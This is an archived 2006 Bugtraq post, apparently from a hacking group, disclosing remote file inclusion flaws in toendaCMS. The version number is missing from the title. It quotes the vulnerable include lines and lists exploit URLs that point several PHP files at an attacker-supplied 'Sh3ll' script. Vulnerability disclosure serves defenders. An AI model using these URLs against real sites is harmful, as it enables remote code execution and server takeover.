Submit ( ToendaCMS<= ( Remote File Include Vulnerabilities )

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Submit ( ToendaCMS<= ( Remote File Include Vulnerabilities )
From: h4ck3riran@xxxxxxxxx
Date: 29 Aug 2006 12:09:02 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

*******************************************************************************
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                           PerSiaNFoX DigitaL SecuritY TeaM  
                                               ***                              
                                                                               
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
***                                                                             
                                                                                
    ***
*******************************************************************************

<# ToendaCMS<= ( Remote File Include Vulnerabilities 

<# Script.............. : toendaCMS
<# Discovered By.... : Root3r_H3ll      
<# Location .......... : Iran
<# Class..............  : Remote
<# Original Advisory : http://Www.PersainFox.com
<# We ArE : Root3r_H3LL , Arash.RJ
<#Spical TNX HB Team , All My Freinds

-------------------------------------------------------------------------------------------------------------

< # CodE : include($tcms_administer_site.'/tcms_global/database.php')

< #Expolit :
< #http://Www.Site.coM/[path]/index.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/browse.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/print.php?tcms_administer_site=Sh3ll
< #http://Www.Site.coM/[path]/setup/inc/database.php?tcms_administer_site=Sh3ll


< # CodE :   require($tcms_administer_site.'/tcms_global/database.php')

< #Expolit :
< #http://Www.Site.coM/[path]/media.php?tcms_administer_site=Sh3ll


< #CodE:  include($site.'.php');

< # Expolit :
< # http://Www.Site.coM/[path]/setup/index.php?site=Sh3ll

Follow-Ups:
- Re: Submit ( ToendaCMS<= ( Remote File Include Vulnerabilities )
  - From: Carsten Eilers

Prev by Date: Submit ( b2evolution<= 1.8 Remote File Include Vulnerabilities )
Next by Date: JS ASP Faq Manager v1.10 sql injection
Previous by thread: Re: Submit ( b2evolution<= 1.8 Remote File Include Vulnerabilities )
Next by thread: Re: Submit ( ToendaCMS<= ( Remote File Include Vulnerabilities )
Index(es):
- Date
- Thread